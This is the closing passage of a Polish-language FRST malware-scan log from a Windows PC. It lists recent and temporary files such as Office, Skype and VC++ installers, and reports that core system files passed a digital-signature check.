2017-04-20 22:20 - 2015-08-04 19:41 - 00002231 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-15 19:17 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2017-04-13 14:54 - 2017-03-02 08:13 - 00000000 ____D C:\Users\K\AppData\Roaming\ScreenShot
2017-04-08 09:11 - 2014-04-03 06:26 - 00000000 ____D C:\ProgramData\Package Cache

==================== Pliki w katalogu głównym wybranych folderów =======

2015-08-04 19:16 - 2017-05-06 09:24 - 0000074 _____ () C:\Users\K\AppData\Roaming\sp_data.sys
2014-04-03 06:33 - 2014-04-03 06:33 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2013-12-12 23:00 - 2012-09-07 13:40 - 0000256 _____ () C:\ProgramData\SetStretch.cmd
2013-12-12 23:00 - 2009-07-22 12:04 - 0024576 _____ () C:\ProgramData\SetStretch.exe
2013-12-12 23:00 - 2012-09-07 13:37 - 0000103 _____ () C:\ProgramData\SetStretch.VBS

Niektóre pliki w TEMP:
====================
2015-12-13 22:43 - 2015-12-13 22:43 - 0071168 _____ () C:\Users\K\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmputau4e.dll
2015-08-04 20:24 - 2013-02-02 13:35 - 0560256 ____R (Microsoft Corporation) C:\Users\K\AppData\Local\Temp\OfficeSetup.exe
2015-08-04 20:24 - 2013-02-02 13:35 - 0560256 ____R (Microsoft Corporation) C:\Users\K\AppData\Local\Temp\SetupHomeStudentRetail.x86.pl-PL_HomeStudentRetail_4W6NR-8VKCR-BV7B4-XXPX2-J4Y3D_act_1_.exe
2017-04-25 21:27 - 2017-04-25 21:28 - 14065664 _____ () C:\Users\K\AppData\Local\Temp\SkypeSetup.exe
2017-04-08 09:11 - 2017-04-08 09:11 - 14456872 _____ (Microsoft Corporation) C:\Users\K\AppData\Local\Temp\vc_redist.x86.exe

==================== Bamital & volsnap ======================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)
C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo
C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo
C:\Windows\explorer.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\Windows\system32\services.exe => Plik podpisany cyfrowo
C:\Windows\system32\User32.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo
C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo

LastRegBack: 2017-04-29 22:51

==================== Koniec FRST.txt ============================